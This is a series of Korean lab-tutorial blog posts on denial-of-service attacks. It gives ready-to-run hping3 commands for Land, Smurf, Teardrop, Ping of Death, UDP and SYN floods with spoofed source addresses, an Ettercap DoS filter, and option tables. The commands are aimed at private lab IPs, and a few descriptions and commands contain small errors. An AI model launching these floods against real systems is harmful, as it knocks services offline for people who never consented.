안녕하세요~ 지방토끼입니다.

오늘은 네트워크 보안 CPU 과부하 공격에 대해서 공부해 보려고 합니다!

그럼 시작해 볼까요?

 

Kali IP : 192.168.15.100

Linux IP : 192.168.15.101

Windows IP : 192.168.15.102

 

CPU 과부하 공격

1. 셸 스크립트 생성(Linux)

# gedit cpu1.sh

 

 

 

2. 실행 권한 변경(Linux)

# chmod 777 cpu1.sh

 

 

3. 셸 스크립트 실행(Linux)

# ./cpu1.sh

 

 

4. 시스템 정보 확인(Linux)

# gnome-system-monitor

 

 

5. 셸 스크립트 생성(Linux)

# vi cpu2.sh

 

 

 

6. 실행 권한 변경(Linux)

# chmod 777 cpu2.sh

 

 

 

7. 셸 스크립트 실행(Linux)

# ./cpu2.sh

 

 

 

8. 시스템 정보 확인(Linux)

# gnome-system-monitor

 

 

 

 

 

 

 

 

 

 

.

.

.

.

.

.

 

오늘은 네트워크 보안 CPU 과부하 공격에 대해서 공부해 보았습니다.!

읽어주셔서 감사합니다!

나쁜 용도로 쓰시면 안돼요!!

틀린 내용이나 부족한 부분이 있다면 댓글 부탁드려용!

 

 

 

 

안녕하세요~ 지방토끼입니다.

오늘은 네트워크 보안 Ettercap을 활용한 DoS 공격에 대해서 공부해 보려고 합니다!

그럼 시작해 볼까요?

 

Kali IP : 192.168.15.100

Linux IP : 192.168.15.101

Windows IP : 192.168.15.102

 

Ettercap을 활용한 DoS 공격

1. 셸 스크립트 생성(Kali)

# vi dos.elt

 

 

 

2. 바이너리 파일 변경(Kali)

# etterfilter /root/dos.elt -o /root/dos.ef

 

 

3. ettercap 실행(Kali)

# ettercap -T -q -F /root/dos.ef -M ARP /192.168.15.102///

 

 

4. 인터넷 접속(Windows)

 

 

 

 

 

 

 

 

 

 

.

.

.

.

.

.

 

오늘은 네트워크 보안 Ettercap을 활용한 DoS 공격에 대해서 공부해 보았습니다.!

읽어주셔서 감사합니다!

나쁜 용도로 쓰시면 안돼요!!

틀린 내용이나 부족한 부분이 있다면 댓글 부탁드려용!

 

 

 

 

안녕하세요~ 지방토끼입니다.

오늘은 네트워크 보안 DoS-Land에 대해서 공부해 보려고 합니다!

그럼 시작해 볼까요?

 

Kali IP : 192.168.15.100

Linux IP : 192.168.15.101

Windows IP : 192.168.15.102

 

DoS

- 서비스 거부 공격

- 자원을 고갈시키는 공격

 

(공격)

- Network : 대역폭 고갈

- System : CPU, Memory, Disk, Process 자원 고갈

 

(명령어)

# hping3 [옵션] [공격 대상]

 

(옵션)

-c : 패킷 수 지정

-d : 데이터 크기

--flood : 최고의 속도로 최대 생성

--fast : 초당 10 패킷

--faster : 초당 100 패킷

 

(IP 옵션)

-a : 출발지 IP 주소 변조

--rand-dest : 랜덤 목적지 IP 주소 변조

--rand-source : 랜덤 출발지 IP 주소 변조

 

(UDP/TCP 옵션)

-s : 출발지 포트 지정

-p : 목적지 포트 지정

-S : SYN flag

-F : FIN flag

-P : PSH flag

-A : ACK flag

-R : RST flag

-U : URG flag

-X : X-mas flag (0x40)

-M : TCP Sequence number

 

(모드 옵션)

기본값 : TCP 모드

-0 : IP 모드

-1 : ICMP 모드

-2 : UDP 모드

-8 : Scan 모드

 

 

Land

- 공격자가 패킷의 공격 대상자의 출발지/목적지 IP 주소출발지/목적지 포트 번호 동일하게 하여 전송함으로써,

공격대상의 컴퓨터가 느려지거나, 동작이 마비되도록 하는 공격

 

1. Land 공격(kali)

# hping3 -a 192.168.15.101 192.168.15.101 --icmp --flood

- 출발지/목적지 IP주소 동일, 패킷 종류 ICMP, 최고의 속도로 최대 생성

 

 

 

2. wireshar & 시스템 정보 확인(Linux)

# wireshark &

# gnome-system-monitor

 

 

 

 

 

 

 

 

 

.

.

.

.

.

.

 

오늘은 네트워크 보안 DoS-Land에 대해서 공부해 보았습니다.!

읽어주셔서 감사합니다!

나쁜 용도로 쓰시면 안돼요!!

틀린 내용이나 부족한 부분이 있다면 댓글 부탁드려용!

 

 

 

 

안녕하세요~ 지방토끼입니다.

오늘은 네트워크 보안 DoS-Smurf(ICMP Flooding)에 대해서 공부해 보려고 합니다!

그럼 시작해 볼까요?

 

Kali IP : 192.168.15.100

Linux IP : 192.168.15.101

Windows IP : 192.168.15.102

 

DoS

- 서비스 거부 공격

- 자원을 고갈시키는 공격

 

(공격)

- Network : 대역폭 고갈

- System : CPU, Memory, Disk, Process 자원 고갈

 

(명령어)

# hping3 [옵션] [공격 대상]

 

(옵션)

-c : 패킷 수 지정

-d : 데이터 크기

--flood : 최고의 속도로 최대 생성

--fast : 초당 10 패킷

--faster : 초당 100 패킷

 

(IP 옵션)

-a : 출발지 IP 주소 변조

--rand-dest : 랜덤 목적지 IP 주소 변조

--rand-source : 랜덤 출발지 IP 주소 변조

 

(UDP/TCP 옵션)

-s : 출발지 포트 지정

-p : 목적지 포트 지정

-S : SYN flag

-F : FIN flag

-P : PSH flag

-A : ACK flag

-R : RST flag

-U : URG flag

-X : X-mas flag (0x40)

-M : TCP Sequence number

 

(모드 옵션)

기본값 : TCP 모드

-0 : IP 모드

-1 : ICMP 모드

-2 : UDP 모드

-8 : Scan 모드

 

 

Smurf(ICMP Flooding)

- 공격대상 컴퓨터의 변조된 원본 IP주소(공격자 주소 -> 공격 대상 IP 주소)를 가진 수많은

ICMP 패킷들(ICMP Echo Reply)을 브로드캐스트 IP 주소를 사용하여 공격

- 여러 호스트가 특정 대상에게 다량의 ICMP Echo Request를 보내어 서비스 거부를 유발시키는 공격

- 출발지 IP를 공격 대상자 IP로 위조한 다량의 ICMP Echo Request를 보내면 공격 대상자에게

다량의 ICMP Echo Reply가 되돌아 감

 

ICMP Echo Request : 8

ICMP Echo Reply : 0

 

(Smurf 공격과 ICMP Flooding 공격의 차이)

Smurf 공격 목적지 주소 : broadcast 주소

 

1. Smurf 공격(kali)

# hping3 -a 192.168.15.101 192.168.15.255 --icmp --flood

- 출발지 IP 주소 공격 대상자 IP 주소로 변조(192.168.10.101), 패킷 종류 ICMP, 최고의 속도로 최대 생성

 

 

 

2. wireshar & 시스템 정보 확인(Linux)

# wireshark &

# gnome-system-monitor

 

 

3. ICMP Flooding 공격(kali)

# hping3 -1 --rand-source 192.168.10.101 -d 65000 --flood

 

 

4. wireshar & 시스템 정보 확인(Linux)

# wireshark &

# gnome-system-monitor

 

 

 

 

 

 

 

 

 

.

.

.

.

.

.

 

오늘은 네트워크 보안 DoS-Smurf(ICMP Flooding)에 대해서 공부해 보았습니다.!

읽어주셔서 감사합니다!

나쁜 용도로 쓰시면 안돼요!!

틀린 내용이나 부족한 부분이 있다면 댓글 부탁드려용!

 

 

 

 

안녕하세요~ 지방토끼입니다.

오늘은 네트워크 보안 DoS-Teardrop(눈물방울 공격)에 대해서 공부해 보려고 합니다!

그럼 시작해 볼까요?

 

Kali IP : 192.168.15.100

Linux IP : 192.168.15.101

Windows IP : 192.168.15.102

 

DoS

- 서비스 거부 공격

- 자원을 고갈시키는 공격

 

(공격)

- Network : 대역폭 고갈

- System : CPU, Memory, Disk, Process 자원 고갈

 

(명령어)

# hping3 [옵션] [공격 대상]

 

(옵션)

-c : 패킷 수 지정

-d : 데이터 크기

--flood : 최고의 속도로 최대 생성

--fast : 초당 10 패킷

--faster : 초당 100 패킷

 

(IP 옵션)

-a : 출발지 IP 주소 변조

--rand-dest : 랜덤 목적지 IP 주소 변조

--rand-source : 랜덤 출발지 IP 주소 변조

 

(UDP/TCP 옵션)

-s : 출발지 포트 지정

-p : 목적지 포트 지정

-S : SYN flag

-F : FIN flag

-P : PSH flag

-A : ACK flag

-R : RST flag

-U : URG flag

-X : X-mas flag (0x40)

-M : TCP Sequence number

 

(모드 옵션)

기본값 : TCP 모드

-0 : IP 모드

-1 : ICMP 모드

-2 : UDP 모드

-8 : Scan 모드

 

 

Teardrop(눈물방울 공격)

- 패킷 크기 일정 크기(MTU) 보다 작게 생성해서 전송(공격), ID/Offset/순서번호 조작

- 공격대상 컴퓨터에 헤더가 조작된 일련의 IP 패킷 조각(IP Fragments)을 전송함으로써, 서비스 속도를 느리게

하거나, 마비시키는 공격 기법

- 조작 : ID, Sequence number, Offset

 

1. Teardrop 공격(kali)

# hping3 -a 100.100.100.100 192.168.15.101 --id 2222 -M 3333 -p 21 --flood

- 출발지 IP주소 100.100.100.100 변조, id 2222, Sequence number 3333, 목적지 포트 21,

최고의 속도로 최대 생성

 

 

 

2. wireshar & 시스템 정보 확인(Linux)

# wireshark &

# gnome-system-monitor

 

 

 

3. Teardrop 공격(kali)

# hping3 -a 100.100.100.100 192.168.15.101 --id 2222 –M 3333 –d 320 –p 21 --flood

- 출발지 IP주소 100.100.100.100 변조, id 2222, Sequence number 3333, 데이터 크기 320, 목적지 포트 21,

최고의 속도로 최대 생성

 

 

 

4. wireshar & 시스템 정보 확인(Linux)

# wireshark &

# gnome-system-monitor

 

 

 

 

 

 

 

 

 

.

.

.

.

.

.

 

오늘은 네트워크 보안 DoS-Teardrop(눈물방울 공격)에 대해서 공부해 보았습니다.!

읽어주셔서 감사합니다!

나쁜 용도로 쓰시면 안돼요!!

틀린 내용이나 부족한 부분이 있다면 댓글 부탁드려용!

 

 

 

 

안녕하세요~ 지방토끼입니다.

오늘은 네트워크 보안 DoS-Ping of Death(죽음의 핑)에 대해서 공부해 보려고 합니다!

그럼 시작해 볼까요?

 

Kali IP : 192.168.15.100

Linux IP : 192.168.15.101

Windows IP : 192.168.15.102

 

DoS

- 서비스 거부 공격

- 자원을 고갈시키는 공격

 

(공격)

- Network : 대역폭 고갈

- System : CPU, Memory, Disk, Process 자원 고갈

 

(명령어)

# hping3 [옵션] [공격 대상]

 

(옵션)

-c : 패킷 수 지정

-d : 데이터 크기

--flood : 최고의 속도로 최대 생성

--fast : 초당 10 패킷

--faster : 초당 100 패킷

 

(IP 옵션)

-a : 출발지 IP 주소 변조

--rand-dest : 랜덤 목적지 IP 주소 변조

--rand-source : 랜덤 출발지 IP 주소 변조

 

(UDP/TCP 옵션)

-s : 출발지 포트 지정

-p : 목적지 포트 지정

-S : SYN flag

-F : FIN flag

-P : PSH flag

-A : ACK flag

-R : RST flag

-U : URG flag

-X : X-mas flag (0x40)

-M : TCP Sequence number

 

(모드 옵션)

기본값 : TCP 모드

-0 : IP 모드

-1 : ICMP 모드

-2 : UDP 모드

-8 : Scan 모드

 

 

Ping of Death(죽음의 핑)

- 패킷 크기 일정 크기(MTU) 보다 크게 생성해서 전송(공격)

- 규정 크기 이상의 ICMP 패킷으로 시스템을 마비시키는 공격

- IP

- ICMP

- TCP

- UDP

- Scanning

 

1. Ping of Death 공격(kali)

# hping3 --icmp -a 100.100.100.100 192.168.15.101 -d 65000 --flood

- 패킷 종류 ICMP, 출발지 IP주소 100.100.100.100 변조, 데이터 크기 65000, 최고의 속도로 최대 생성

 

 

 

2. wireshar & 시스템 정보 확인(Linux)

# wireshark &

# gnome-system-monitor

 

 

 

3. Ping of Death 공격(kali)

# hping3 --icmp --rand-source 192.168.15.101 -d 65000 --flood

- 패킷 종류 ICMP, 랜덤 출발지 IP 주소 변조, 데이터 크기 65000, 최고의 속도로 최대 생성

 

 

4. wireshar & 시스템 정보 확인(Linux)

# wireshark &

# gnome-system-monitor

 

 

 

 

 

 

 

 

.

.

.

.

.

.

 

오늘은 네트워크 보안 DoS-Ping of Death(죽음의 핑)에 대해서 공부해 보았습니다.!

읽어주셔서 감사합니다!

나쁜 용도로 쓰시면 안돼요!!

틀린 내용이나 부족한 부분이 있다면 댓글 부탁드려용!

 

 

 

 

안녕하세요~ 지방토끼입니다.

오늘은 네트워크 보안 DoS-UDP Flooding에 대해서 공부해 보려고 합니다!

그럼 시작해 볼까요?

 

Kali IP : 192.168.15.100

Linux IP : 192.168.15.101

Windows IP : 192.168.15.102

 

DoS

- 서비스 거부 공격

- 자원을 고갈시키는 공격

 

(공격)

- Network : 대역폭 고갈

- System : CPU, Memory, Disk, Process 자원 고갈

 

(명령어)

# hping3 [옵션] [공격 대상]

 

(옵션)

-c : 패킷 수 지정

-d : 데이터 크기

--flood : 최고의 속도로 최대 생성

--fast : 초당 10 패킷

--faster : 초당 100 패킷

 

(IP 옵션)

-a : 출발지 IP 주소 변조

--rand-dest : 랜덤 목적지 IP 주소 변조

--rand-source : 랜덤 출발지 IP 주소 변조

 

(UDP/TCP 옵션)

-s : 출발지 포트 지정

-p : 목적지 포트 지정

-S : SYN flag

-F : FIN flag

-P : PSH flag

-A : ACK flag

-R : RST flag

-U : URG flag

-X : X-mas flag (0x40)

-M : TCP Sequence number

 

(모드 옵션)

기본값 : TCP 모드

-0 : IP 모드

-1 : ICMP 모드

-2 : UDP 모드

-8 : Scan 모드

 

 

 

UDP Flooding

- UDP 패킷다량으로 전송하여 공격 대상자가 정상적인 서비스를 이용하지 못하게 대역폭을 소모

 

1. 포트 스캔(Kali)

# nmap 192.168.15.101

 

 

 

2. UDP Flooding(Kali)

# hping3 -2 --rand-source 192.168.15.101 -d 650000 -p 53 --flood

- UDP, 랜덤 출발지 IP주소, 데이터 크기 650000, 목적지 포트 53, 최고의 속도로 최대 생성

 

 

 

3. wireshar & 시스템 정보 확인(Linux)

# wireshark &

# gnome-system-monitor

 

 

 

 

 

 

 

 

 

 

.

.

.

.

.

.

 

오늘은 네트워크 보안 DoS-UDP Flooding에 대해서 공부해 보았습니다.!

읽어주셔서 감사합니다!

나쁜 용도로 쓰시면 안돼요!!

틀린 내용이나 부족한 부분이 있다면 댓글 부탁드려용!

 

 

 

 

안녕하세요~ 지방토끼입니다.

오늘은 네트워크 보안 DoS-SYN Flooding에 대해서 공부해 보려고 합니다!

그럼 시작해 볼까요?

 

Kali IP : 192.168.15.100

Linux IP : 192.168.15.101

Windows IP : 192.168.15.102

 

DoS

- 서비스 거부 공격

- 자원을 고갈시키는 공격

 

(공격)

- Network : 대역폭 고갈

- System : CPU, Memory, Disk, Process 자원 고갈

 

(명령어)

# hping3 [옵션] [공격 대상]

 

(옵션)

-c : 패킷 수 지정

-d : 데이터 크기

--flood : 최고의 속도로 최대 생성

--fast : 초당 10 패킷

--faster : 초당 100 패킷

 

(IP 옵션)

-a : 출발지 IP 주소 변조

--rand-dest : 랜덤 목적지 IP 주소 변조

--rand-source : 랜덤 출발지 IP 주소 변조

 

(UDP/TCP 옵션)

-s : 출발지 포트 지정

-p : 목적지 포트 지정

-S : SYN flag

-F : FIN flag

-P : PSH flag

-A : ACK flag

-R : RST flag

-U : URG flag

-X : X-mas flag (0x40)

-M : TCP Sequence number

 

(모드 옵션)

기본값 : TCP 모드

-0 : IP 모드

-1 : ICMP 모드

-2 : UDP 모드

-8 : Scan 모드

 

 

SYN Flooding

- SYN 패킷을 최대로 생성해서 최고의 속도로 전송 (시스템 자원 고갈)

- SYN 패킷으로 BackLog를 채워서 비우지 못하도록 만듬

- TCP 연결과정(3Way Handshake)에서 취약점을 이용하여 공격

(SYN + ACK를 받고 나서 ACK를 일부러 보내지 않으면 서버는 계속 응답을 받을 때까지 기다리게 된다.)

 

 

1. 포트 스캔(Kali)

# nmap 192.168.15.101

 

 

 

2. SYN Flooding(Kali)

# hping3 -a 100.100.100.100 192.168.15.101 -S -p 80 —flood

- 출발지 IP 100.100.100.100으로 변조, SYN flag, 목적지 포트 80, 최고의 속도로 최대 생성

 

 

 

3. wireshar & 시스템 정보 확인(Linux)

# wireshark &

# gnome-system-monitor

 

 

 

4. 네트워크 상태 확인(Linux)

# netstat –tuna

 

 

 

5. 포트 스캔(Kali)

# nmap 192.168.15.102

 

 

6. SYN Flooding(Kali)

# hping3 -a 100.100.100.100 192.168.15.102 -S -p 445 --flood

- 출발지 IP 100.100.100.100으로 변조, SYN flag, 목적지 포트 445, 최고의 속도로 최대 생성

 

 

 

7. 네트워크 상태 확인(Windows)

> netstat –an

 

 

 

8. SYN Flooding(Kali)

# hping3 -a 100.100.100.100 192.168.15.101 -S -p 80 -c 10

- 출발지 IP 100.100.100.100으로 변조, SYN flag, 목적지 포트 80, 패킷 수 10

 

 

 

# hping3 -a 100.100.100.100 192.168.15.101 -S -p 80 --fast

- 출발지 IP 100.100.100.100으로 변조, SYN flag, 목적지 포트 80, 초당 10 패킷

 

# hping3 -a 100.100.100.100 192.168.15.101 -S -p 80 --faster

- 출발지 IP 100.100.100.100으로 변조, SYN flag, 목적지 포트 80, 초당 100 패킷

 

 

 

 

 

 

 

 

 

 

.

.

.

.

.

.

 

오늘은 네트워크 보안 DoS-SYN Flooding에 대해서 공부해 보았습니다.!

읽어주셔서 감사합니다!

나쁜 용도로 쓰시면 안돼요!!

틀린 내용이나 부족한 부분이 있다면 댓글 부탁드려용!

 

 

 

 

+ Recent posts